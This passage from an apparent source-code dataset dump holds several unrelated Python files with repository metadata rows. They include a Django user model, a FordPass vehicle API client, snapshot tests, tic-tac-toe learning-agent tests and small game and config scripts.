def array_or_tensor(tensor, numpy, input):
    """Return `tensor` converted to a torch.Tensor when numpy is False or `input`
    is tensor data; otherwise return it as a numpy array (also for DataLoaders).
    """
    if numpy is False:
        want_tensor = True
    elif (numpy is True) or is_dl(input):
        want_tensor = False
    elif not (is_data(input) or is_dl(input)):
        raise ValueError(f"Do not understand type of `input`: {type(input)}")
    elif tuplefy(input).type() is torch.Tensor:
        want_tensor = True
    elif tuplefy(input).type() is np.ndarray:
        want_tensor = False
    else:
        raise ValueError("Something wrong")
    wrapped = tuplefy(tensor)
    converted = wrapped.to_tensor() if want_tensor else wrapped.to_numpy()
    return converted.val_if_single()
def is_data(input):
    """Returns True if `input` is data of type tuple, list, TupleTree, np.array, torch.Tensor."""
    # isinstance accepts a tuple of types directly; no list comprehension needed.
    return isinstance(input, (np.ndarray, torch.Tensor, tuple, list, TupleTree))
def is_dl(input):
    """Returns True if `input` is a DataLoader (inherit from DataLoader)."""
    dataloader_cls = torch.utils.data.DataLoader
    return isinstance(input, dataloader_cls)
| [
"georgechen@cmu.edu"
] | georgechen@cmu.edu |
ab3cf183492b72d65e67edb8536855e59cb7a7a9 | 0c56fadfb966af74464f446d2be76fd0aeef3622 | /apps/accounts/models.py | aa66c193408c32f873c18541d188c0ba997c38f7 | [] | no_license | Lh4cKg/adoption | 847d195b8b1e70a18b5c9d5e68137672381e39b5 | c28fd09d07f35f0ce22749c447bc637fd474fafb | refs/heads/master | 2020-03-11T03:44:19.643285 | 2018-04-19T12:26:26 | 2018-04-19T12:26:26 | 129,756,984 | 0 | 0 | null | 2018-04-16T14:33:42 | 2018-04-16T14:33:42 | null | UTF-8 | Python | false | false | 2,263 | py | from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
class MyUserManager(BaseUserManager):
    """Manager that knows how to create superusers for the custom user model."""
    use_in_migrations = True

    # python manage.py createsuperuser
    def create_superuser(self, email, is_staff, password):
        """Create, save and return a superuser with the given credentials."""
        superuser = self.model(email=email, is_staff=is_staff)
        superuser.set_password(password)
        superuser.save(using=self._db)
        return superuser
class UserModel(AbstractBaseUser):
    """Custom user model that logs in with an email address instead of a username."""
    sys_id = models.AutoField(primary_key=True, blank=True)
    nickname = models.CharField(max_length = 17, blank = False, null= False)
    location = models.CharField(max_length = 17, blank = False, null= False)
    first_name = models.CharField(max_length = 255, blank= False, null = False)
    last_name = models.CharField(max_length = 255, blank= False, null = False)
    # Email doubles as the login identifier (see USERNAME_FIELD below).
    email = models.EmailField(max_length=127, unique=True, null=False, blank=False)
    is_staff = models.BooleanField(default = False)
    is_active = models.BooleanField(default=True)
    slug = models.SlugField(null = True, blank = True)
    # Custom manager provides create_superuser for `manage.py createsuperuser`.
    objects = MyUserManager()
    USERNAME_FIELD = "email"
    # REQUIRED_FIELDS must contain all required fields on your User model,
    # but should not contain the USERNAME_FIELD or password as these fields will always be prompted for.
    REQUIRED_FIELDS = ['is_staff']
    class Meta:
        app_label = "accounts"
        db_table = "users"
    def __str__(self):
        return self.email
    def get_full_name(self):
        """
        Returns the first_name plus the last_name, with a space in between.
        """
        full_name = '%s %s' %(self.first_name, self.last_name)
        return full_name.strip()
    def get_username(self):
        return self.email
    def get_short_name(self):
        return self.first_name + self.last_name
    # These permission methods are required so staff users can log in to the admin panel.
    def has_perm(self, perm, obj=None):
        return self.is_staff
    # These permission methods are required so staff users can log in to the admin panel.
    def has_module_perms(self, app_label):
        return self.is_staff
"timaraczarko@gmail.com"
] | timaraczarko@gmail.com |
7a815792cdd656855418bc4958637547f89f5252 | 25d7db979a6575b6cccee3fe16838fc1a5892579 | /cfg.py | 294b993f6994cbd785fb16736b7eb32a0a515335 | [] | no_license | cotyb/IR-for-SDN-compiler | b0603db25b781fbd054a9563bb18a97345d7d44a | 647263e848d76ded14acc7c78bd5cacbce8d5108 | refs/heads/master | 2021-04-28T21:32:46.236850 | 2017-05-06T06:20:51 | 2017-05-06T06:20:51 | 77,768,881 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | # function = ["dpi", "nat", "count", "ftp"]
# fun_switch = {'dpi':['a', 'b'], 'nat':['c', 'd'], 'count':['j'], 'ftp':['f']}
# fun_guard_update = {'dpi':['', ''], 'nat':['', ''], 'count':['', 'rv(CNT)'], 'ftp':['']}
# NOTE(review): the commented lines above look like an older configuration that also
# enabled a 'count' function - kept for reference.
# Network functions enabled in this configuration.
function = ["dpi", "nat","ftp"]
# Switches associated with each function - presumably placement candidates; TODO confirm.
fun_switch = {'dpi':['a', 'b'], 'nat':['c', 'd'], 'ftp':['f']}
# Per-function [guard, update] expression pairs; empty strings mean none.
fun_guard_update = {'dpi':['', ''], 'nat':['', ''], 'ftp':['']}
# Packet header field names, and the same fields in dotted protocol notation
# (the two lists are index-aligned).
header_field = ["dstip", "srcip", "srcport", "dstport"]
header_field_1 = ["ip.dst", "ip.src", "tcp.src", "tcp.dst"]
# Globally tracked resources - presumably bandwidth and a counter; TODO confirm semantics.
global_resource = ['bw', 'NUM']
"xieleicotyb@gmail.com"
] | xieleicotyb@gmail.com |
56df3386f3c3d38d16dd134e869bf280c5836984 | d1c2de29cc94ddc6d3cfcfaa842c5e4dbddb5652 | /src/quoridor.py | bf03f4548bdfcca8c57d91257d0ef42bba7d1326 | [] | no_license | marmelab/quoridor-python | 09b02fd9db5980e46c2a7250763f2b8b9a1c221c | e76c51d00b1a228aea5b58798be427bcdecd7794 | refs/heads/master | 2023-06-05T19:37:00.759435 | 2020-05-11T11:40:03 | 2020-05-11T11:40:03 | 191,528,919 | 0 | 1 | null | 2019-06-18T10:51:49 | 2019-06-12T08:21:32 | Python | UTF-8 | Python | false | false | 120 | py | import game
def main():
    """Initialise a new Quoridor game and run its main loop."""
    game.progress(game.init_game())


if __name__ == "__main__":
    main()
| [
"matthieu.chaffotte@gmail.com"
] | matthieu.chaffotte@gmail.com |
f3e9c32e44bf0d6c8eecdc1fd66d8f7071c82827 | 7d8588cb855ca9039ed6eced402975274ad578a0 | /custom_components/fordpass_china/fordpass.py | cf44d16a6247ab278506d45c8e3bdd27af85b8b7 | [
"MIT"
] | permissive | my7hcry/fordpass_china | a9e3c14c602c14d2b4ffc3e787353bfa93c6f31f | 07268780c4044ba552166819f3c4ea11b4bcc3e3 | refs/heads/main | 2023-06-30T09:46:20.277115 | 2021-07-16T14:36:12 | 2021-07-16T14:36:12 | 393,597,119 | 0 | 0 | MIT | 2021-08-07T06:12:24 | 2021-08-07T06:12:24 | null | UTF-8 | Python | false | false | 7,980 | py | import time
import json
import logging
import requests
from .const import (
SSO_URL,
CV_URL,
API_URL,
CLIENT_ID,
DEFAULT_HEADERS,
API_HEADERS
)
_LOGGER = logging.getLogger(__name__)
class FordPass(object):
    """Minimal client for the FordPass (China) connected-vehicle API.

    Handles login and token refresh against the SSO/API endpoints and exposes
    vehicle queries plus remote commands (lock/unlock, engine start/stop).
    """

    def __init__(self, username, password):
        self._username = username
        self._password = password
        # Access token, its refresh token and the expiry timestamp (epoch seconds).
        self._token = None
        self._refresh_token = None
        self._expires = None

    def auth(self):
        """Perform a full login; return True when an API token was obtained."""
        self._token = None
        self._refresh_token = None
        self._expires = None
        data = {
            "client_id": CLIENT_ID,
            "grant_type": "password",
            "username": self._username,
            "password": self._password,
        }
        headers = {
            **DEFAULT_HEADERS,
            "Content-Type": "application/x-www-form-urlencoded",
        }
        try:
            r = requests.post(
                f"{SSO_URL}/oidc/endpoint/default/token",
                data=data,
                headers=headers,
                timeout=5
            )
            if r.status_code == 200:
                result = r.json()
                # Exchange the SSO access token for an API token.
                data = {"code": result["access_token"]}
                r = requests.put(
                    f"{API_URL}api/oauth2/v1/token",
                    data=json.dumps(data),
                    headers=API_HEADERS,
                    timeout=5
                )
                if r.status_code == 200:
                    result = r.json()
                    self._token = result["access_token"]
                    self._refresh_token = result["refresh_token"]
                    # Renew 100 seconds ahead of the server-side expiry.
                    self._expires = time.time() + result["expires_in"] - 100
        except requests.exceptions.RequestException:
            _LOGGER.debug("Timed out when auth")
        return self._token is not None

    def refresh_token(self):
        """Refresh the access token; fall back to a full re-auth on HTTP 401."""
        data = {"refresh_token": self._refresh_token}
        try:
            r = requests.put(
                f"{API_URL}api/oauth2/v1/refresh",
                data=json.dumps(data),
                headers=API_HEADERS,
                timeout=5
            )
            if r.status_code == 200:
                result = r.json()
                self._token = result["access_token"]
                self._refresh_token = result["refresh_token"]
                self._expires = time.time() + result["expires_in"] - 100
            elif r.status_code == 401:
                self.auth()
            else:
                _LOGGER.debug(f"Got unexpected status code when refresh token - {r.status_code}")
        except requests.exceptions.RequestException:
            _LOGGER.debug("Timed out when refresh token")

    def check_token(self):
        """Ensure a usable token exists (refreshing or re-authing as needed)."""
        if self._expires:
            if time.time() > self._expires:
                self.refresh_token()
        else:
            self.auth()
        return self._token is not None

    def get_user_info(self):
        """Fetch the account's user info; return the parsed JSON or None."""
        result = None
        if self.check_token():
            params = {"lrdt": "01-01-1970 00:00:00"}
            headers = {
                **API_HEADERS,
                "auth-token": self._token
            }
            try:
                r = requests.get(
                    f"{CV_URL}api/users", params=params, headers=headers, timeout=5
                )
                if r.status_code == 200:
                    result = r.json()
                else:
                    _LOGGER.debug(f"Got unexpected status code when get user info - {r.status_code}")
            except requests.exceptions.RequestException:
                _LOGGER.debug("Timed out when get user info")
        return result

    def get_vehicles(self):
        """List the vehicles on the account; return the parsed JSON or None."""
        result = None
        if self.check_token():
            params = {
                "language": "ZH",
                "region": "CN",
                "country": "CHN",
            }
            headers = {
                **API_HEADERS,
                "auth-token": self._token
            }
            try:
                r = requests.get(
                    f"{API_URL}api/dashboard/v1/users/vehicles",
                    params=params,
                    headers=headers,
                    timeout=5
                )
                if r.status_code == 200:
                    result = r.json()
                else:
                    _LOGGER.debug(f"Got unexpected status code when get vehicles - {r.status_code}")
            except requests.exceptions.RequestException:
                _LOGGER.debug("Timed out when get vehicles")
        return result

    def get_vehicle_status(self, vin):
        """Fetch the status of the vehicle identified by `vin`; JSON or None."""
        result = None
        if self.check_token():
            params = {"lrdt": "01-01-1970 00:00:00"}
            headers = {
                **API_HEADERS,
                "auth-token": self._token
            }
            try:
                r = requests.get(
                    f"{CV_URL}api/vehicles/v4/{vin}/status",
                    params=params,
                    headers=headers,
                    timeout=5
                )
                if r.status_code == 200:
                    result = r.json()
                else:
                    _LOGGER.debug(f"Got unexpected status code when get vehicle status - {r.status_code}")
            except requests.exceptions.RequestException:
                _LOGGER.debug("Timed out when get vehicle status")
        return result

    def _send_command(self, opt, url):
        """Issue a remote command with the HTTP verb `opt`; return its commandId or None."""
        if self.check_token():
            headers = {
                **API_HEADERS,
                "auth-token": self._token
            }
            try:
                r = getattr(requests, opt)(url, headers=headers, timeout=5)
                if r.status_code == 200:
                    rjson = r.json()
                    if rjson["status"] == 200:
                        return rjson["commandId"]
                    else:
                        _LOGGER.debug(f"Got unexpected status code when {opt} {url} - {rjson}")
            except requests.exceptions.RequestException:
                _LOGGER.debug(f"Timed out when {opt} {url}")
        return None

    def _send_check_command(self, url):
        """Poll a previously issued command; True once it completed, else False."""
        if self.check_token():
            headers = {
                **API_HEADERS,
                "auth-token": self._token
            }
            try:
                r = requests.get(url, headers=headers, timeout=5)
                if r.status_code == 200:
                    rjson = r.json()
                    if rjson["status"] == 200:
                        return True
                    elif rjson["status"] != 552:  # 552 means the command is still pending
                        pass
                else:
                    # Bug fix: `rjson` is undefined in this branch (the body was
                    # never parsed), so log the HTTP status code instead.
                    _LOGGER.debug(f"Got unexpected status code when get {url} - {r.status_code}")
            except requests.exceptions.RequestException:
                _LOGGER.debug(f"Timed out when get {url} ")
        return False

    def lock_doors(self, vin):
        """Lock the doors; returns the commandId for check_lock, or None."""
        return self._send_command("put", f"{CV_URL}api/vehicles/v2/{vin}/doors/lock")

    def unlock_doors(self, vin):
        """Unlock the doors; returns the commandId for check_lock, or None."""
        return self._send_command("delete", f"{CV_URL}api/vehicles/v2/{vin}/doors/lock")

    def start_engine(self, vin):
        """Remote-start the engine; returns the commandId for check_engine, or None."""
        return self._send_command("put", f"{CV_URL}api/vehicles/v2/{vin}/engine/start")

    def stop_engine(self, vin):
        """Stop the remote-started engine; returns the commandId, or None."""
        return self._send_command("delete", f"{CV_URL}api/vehicles/v2/{vin}/engine/start")

    def check_lock(self, vin, command_id):
        """Return True once the lock/unlock command `command_id` has completed."""
        return self._send_check_command(f"{CV_URL}api/vehicles/v2/{vin}/doors/lock/{command_id}")

    def check_engine(self, vin, command_id):
        """Return True once the engine command `command_id` has completed."""
        return self._send_check_command(f"{CV_URL}api/vehicles/v2/{vin}/engine/start/{command_id}")
"noreply@github.com"
] | noreply@github.com |
a9a44cb9da81256da9932be1d7d4fdfa9d7ef260 | eccdc3563ff80957cc24e5ff35f4e3c2fc173c5b | /sirius/coding/test_image_coding_snapshots.py | d6e920a638a556559b41d06402868fc4a2eb7e67 | [] | no_license | nordprojects/sirius | c8c420ba5082c443fd14443128be30dda34541f4 | 9d88c63a0fc17d4acc5ae12194b93f8591e35a55 | refs/heads/main | 2023-07-08T12:40:26.407049 | 2023-07-07T15:47:55 | 2023-07-07T15:47:55 | 116,666,765 | 41 | 23 | null | 2023-07-07T15:47:56 | 2018-01-08T11:10:48 | Python | UTF-8 | Python | false | false | 1,425 | py | import os
import datetime
from tempfile import TemporaryDirectory
from PIL import Image
import snapshottest
from snapshottest.file import FileSnapshot
from sirius.coding import image_encoding
from sirius.coding import templating
class ImageCodingSnapshotCase(snapshottest.TestCase):
    """Snapshot tests that render HTML fixtures to PNG and compare them to stored snapshots."""

    def _check_html(self, name, html):
        """Render `html` to a PNG file and assert it matches the snapshot `name`."""
        print('Checking fixture named: %s' % name)  # typo "Cheking" fixed
        with TemporaryDirectory() as tmpdir:
            data = image_encoding.html_to_png(html)
            image = Image.open(data)
            temp_file_name = os.path.join(tmpdir, '%s.png' % name)
            image.save(temp_file_name, format='PNG')
            self.assertMatchSnapshot(FileSnapshot(temp_file_name), name)

    def test_snapshot_fixtures(self):
        """Plain HTML documents render to the snapshotted PNGs."""
        fixtures = {
            'hello_world': '<html><body>Hello, world!</body></html>',
        }
        for name, html in fixtures.items():
            self._check_html(name, html)

    def test_snapshot_template_fixtures(self):
        """HTML snippets wrapped in the default template render to the snapshotted PNGs."""
        fixtures = {
            'hello_world': '<p>Hello, world!</p>',
        }
        fixture_username = 'somebody'
        fixture_date = datetime.datetime(2012, 2, 3, 15, 46, 12)
        for name, snippet in fixtures.items():
            self._check_html(
                name, templating.default_template(
                    snippet,
                    fixture_username,
                    fixture_date
                )
            )
"notjosh@gmail.com"
] | notjosh@gmail.com |
c21202a66c452dff01039f8b67e27e7865f8a7b5 | 0fdd56fd597b696508deb057903c1e214fedff99 | /machine_learing_games/Agents/LearningAgents/TestAgentsIn9FieldTicTacToe.py | ab94a1899bac1733d1b4eb78aaf501a595749026 | [] | no_license | blackicetee/Python | 297f90e473291ea7a15cd754fb6ff8bc19a2f8fd | e7ff497394dfa096fc79ac4f63a0bf05abc1b287 | refs/heads/master | 2021-01-13T13:41:56.510489 | 2017-03-19T18:08:57 | 2017-03-19T18:08:57 | 76,386,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,395 | py | import unittest
from machine_learing_games.Agents import HeuristicSearchAgentTicTacToe
from machine_learing_games.Agents import RandomAgent
from machine_learing_games.Agents.LearningAgents.TicTacToeTDQLearningAgent import TicTacToeTDQLearningAgent, \
TICTACTOE_3x3_TDQ_AGENT_100_NAME, TICTACTOE_3x3_TDQ_AGENT_1000_NAME, TICTACTOE_3x3_TDQ_AGENT_10000_NAME
from machine_learing_games.tictactoe.TicTacToe import TicTacToe
class TestTDQAgent100TrainingGamesIn9FiledTicTacToe(unittest.TestCase):
    """Plays 100 games pitting the TD-Q agent (trained on 100 games) against a
    random agent and a heuristic-search agent, moving first and second, and
    asserts the TD-Q agent wins at least half of them.
    In these games the player that moves first plays 'X', the second player 'O'.
    """
    def testAgainstFirstMoveRandomAgentIn100Testgames(self):
        randomAgentWins = 0
        tdqAgent100Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
            # Random agent moves first ('X'); TD-Q agent answers ('O').
            while not ttt.is_terminal():
                RandomAgent.processTicTacToeAction(ttt)
                if not ttt.is_terminal():
                    ttt.make_move(tdqAgent100.suggestAction(ttt))
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                randomAgentWins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                tdqAgent100Wins += 1
        print 'First Move random agent wins: ' + str(
            randomAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
        print 'Second Move TD-Q-Agent-100 wins: ' + str(
            tdqAgent100Wins) + ' games against random agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent100Wins >= 50)
    def testAgainstSecondMoveRandomAgentIn100Testgames(self):
        randomAgentWins = 0
        tdqAgent100Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
            # TD-Q agent moves first ('X'); random agent answers ('O').
            while not ttt.is_terminal():
                ttt.make_move(tdqAgent100.suggestAction(ttt))
                if not ttt.is_terminal():
                    RandomAgent.processTicTacToeAction(ttt)
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                tdqAgent100Wins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                randomAgentWins += 1
        print 'Second Move random agent wins: ' + str(
            randomAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
        print 'First Move TD-Q-Agent-100 wins: ' + str(
            tdqAgent100Wins) + ' games against random agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent100Wins >= 50)
    def testAgainstFirstMoveHeuristikAgentIn100Testgames(self):
        heuristicSearchAgentWins = 0
        tdqAgent100Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
            # Heuristic search agent moves first ('X'); TD-Q agent answers ('O').
            while not ttt.is_terminal():
                HeuristicSearchAgentTicTacToe.processAction(ttt)
                if not ttt.is_terminal():
                    ttt.make_move(tdqAgent100.suggestAction(ttt))
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                heuristicSearchAgentWins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                tdqAgent100Wins += 1
        print 'First move heuristic search agent wins: ' + str(
            heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
        print 'Second move TD-Q-Agent-100 wins: ' + str(
            tdqAgent100Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent100Wins >= 50)
    def testAgainstSecondMoveHeuristikAgentIn100Testgames(self):
        heuristicSearchAgentWins = 0
        tdqAgent100Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
            # TD-Q agent moves first ('X'); heuristic search agent answers ('O').
            while not ttt.is_terminal():
                action = tdqAgent100.suggestAction(ttt)
                print action
                ttt.make_move(action)
                if not ttt.is_terminal():
                    HeuristicSearchAgentTicTacToe.processAction(ttt)
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                tdqAgent100Wins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                heuristicSearchAgentWins += 1
        print 'Second move heuristic search agent wins: ' + str(
            heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
        print 'First move TD-Q-Agent-100 wins: ' + str(
            tdqAgent100Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent100Wins >= 50)
class TestTDQAgent1000TrainingGamesIn9FiledTicTacToe(unittest.TestCase):
    """Same four match-ups as the 100-game class, but for the TD-Q agent trained
    on 1000 games. First mover plays 'X', second mover plays 'O'.
    """
    def testAgainstFirstMoveRandomAgentIn100Testgames(self):
        randomAgentWins = 0
        tdqAgent1000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
            while not ttt.is_terminal():
                RandomAgent.processTicTacToeAction(ttt)
                if not ttt.is_terminal():
                    ttt.make_move(tdqAgent1000.suggestAction(ttt))
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                randomAgentWins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                tdqAgent1000Wins += 1
        print 'First Move random agent wins: ' + str(
            randomAgentWins) + ' games against TD-Q-Agent-1000 in 9 field Tic Tac Toe!'
        print 'Second Move TD-Q-Agent-1000 wins: ' + str(
            tdqAgent1000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent1000Wins >= 50)
    def testAgainstSecondMoveRandomAgentIn100Testgames(self):
        randomAgentWins = 0
        tdqAgent1000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
            while not ttt.is_terminal():
                ttt.make_move(tdqAgent1000.suggestAction(ttt))
                if not ttt.is_terminal():
                    RandomAgent.processTicTacToeAction(ttt)
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                tdqAgent1000Wins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                randomAgentWins += 1
        print 'Second move random agent wins: ' + str(
            randomAgentWins) + ' games against TD-Q-Agent-1000 in 9 field Tic Tac Toe!'
        print 'First move TD-Q-Agent-1000 wins: ' + str(
            tdqAgent1000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent1000Wins >= 50)
    def testAgainstFirstMoveHeuristikAgentIn100Testgames(self):
        heuristicSearchAgentWins = 0
        tdqAgent1000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
            while not ttt.is_terminal():
                HeuristicSearchAgentTicTacToe.processAction(ttt)
                if not ttt.is_terminal():
                    ttt.make_move(tdqAgent1000.suggestAction(ttt))
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                heuristicSearchAgentWins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                tdqAgent1000Wins += 1
        # NOTE(review): the message below says "TD-Q-Agent-100" although this
        # class exercises the 1000-game agent - looks like a copy-paste slip.
        print 'First move heuristic search agent wins: ' + str(
            heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
        print 'Second move TD-Q-Agent-1000 wins: ' + str(
            tdqAgent1000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent1000Wins >= 50)
    def testAgainstSecondMoveHeuristikAgentIn100Testgames(self):
        heuristicSearchAgentWins = 0
        tdqAgent1000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
            while not ttt.is_terminal():
                action = tdqAgent1000.suggestAction(ttt)
                print action
                ttt.make_move(action)
                if not ttt.is_terminal():
                    HeuristicSearchAgentTicTacToe.processAction(ttt)
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                tdqAgent1000Wins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                heuristicSearchAgentWins += 1
        print 'Second move heuristic search agent wins: ' + str(
            heuristicSearchAgentWins) + ' games against TD-Q-Agent-1000 in 9 field Tic Tac Toe!'
        print 'First move TD-Q-Agent-1000 wins: ' + str(
            tdqAgent1000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent1000Wins >= 50)
class TestTDQAgent10000TrainingGamesIn9FiledTicTacToe(unittest.TestCase):
    """Same four match-ups as the 100-game class, but for the TD-Q agent trained
    on 10000 games. First mover plays 'X', second mover plays 'O'.
    """
    def testAgainstFirstMoveRandomAgentIn100Testgames(self):
        randomAgentWins = 0
        tdqAgent10000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
            while not ttt.is_terminal():
                RandomAgent.processTicTacToeAction(ttt)
                if not ttt.is_terminal():
                    ttt.make_move(tdqAgent10000.suggestAction(ttt))
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                randomAgentWins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                tdqAgent10000Wins += 1
        print 'First Move random agent wins: ' + str(
            randomAgentWins) + ' games against TD-Q-Agent-10000 in 9 field Tic Tac Toe!'
        print 'Second Move TD-Q-Agent-10000 wins: ' + str(
            tdqAgent10000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent10000Wins >= 50)
    def testAgainstSecondMoveRandomAgentIn100Testgames(self):
        randomAgentWins = 0
        tdqAgent10000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
            while not ttt.is_terminal():
                ttt.make_move(tdqAgent10000.suggestAction(ttt))
                if not ttt.is_terminal():
                    RandomAgent.processTicTacToeAction(ttt)
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                tdqAgent10000Wins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                randomAgentWins += 1
        print 'Second move random agent wins: ' + str(
            randomAgentWins) + ' games against TD-Q-Agent-10000 in 9 field Tic Tac Toe!'
        print 'First move TD-Q-Agent-10000 wins: ' + str(
            tdqAgent10000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent10000Wins >= 50)
    def testAgainstFirstMoveHeuristikAgentIn100Testgames(self):
        heuristicSearchAgentWins = 0
        tdqAgent10000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
            while not ttt.is_terminal():
                HeuristicSearchAgentTicTacToe.processAction(ttt)
                if not ttt.is_terminal():
                    ttt.make_move(tdqAgent10000.suggestAction(ttt))
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                heuristicSearchAgentWins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                tdqAgent10000Wins += 1
        # NOTE(review): the message below says "TD-Q-Agent-100" although this
        # class exercises the 10000-game agent - looks like a copy-paste slip.
        print 'First move heuristic search agent wins: ' + str(
            heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
        print 'Second move TD-Q-Agent-10000 wins: ' + str(
            tdqAgent10000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent10000Wins >= 50)
    def testAgainstSecondMoveHeuristikAgentIn100Testgames(self):
        heuristicSearchAgentWins = 0
        tdqAgent10000Wins = 0
        for testGameCount in range(100):
            ttt = TicTacToe(3)
            tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
            while not ttt.is_terminal():
                action = tdqAgent10000.suggestAction(ttt)
                print action
                ttt.make_move(action)
                if not ttt.is_terminal():
                    HeuristicSearchAgentTicTacToe.processAction(ttt)
            print ttt.printable_game_matrix()
            if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
                tdqAgent10000Wins += 1
            elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
                heuristicSearchAgentWins += 1
        print 'Second move heuristic search agent wins: ' + str(
            heuristicSearchAgentWins) + ' games against TD-Q-Agent-10000 in 9 field Tic Tac Toe!'
        print 'First move TD-Q-Agent-10000 wins: ' + str(
            tdqAgent10000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
        self.assertTrue(tdqAgent10000Wins >= 50)
"blackicetee@gmx.de"
] | blackicetee@gmx.de |
6d0218c02fd2a5f9dd00423791f0d95511b9be27 | 5ed2ef7a557ec4ba8835f47dc7ae110efc7901a3 | /advanced payslip generator.py | 2d767e86c41a499149afd840954c66c2dff298d3 | [] | no_license | 44858/records | 74caf42bf189aeaf32a6465d465ce20abf2e2ec2 | 4c20c35b4906466ba7a806121e1b1deb2ccf8551 | refs/heads/master | 2020-04-04T20:13:02.530928 | 2015-01-30T14:30:59 | 2015-01-30T14:30:59 | 29,735,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | #Lewis Travers
#30/01/2015
#Payslip Generator advanced
class Payslip:
    """Simple record of one employee's payslip data."""

    def __init__(self, name=None, number=None, hours=None, pay=None):
        # All fields default to None so the historical no-argument Payslip()
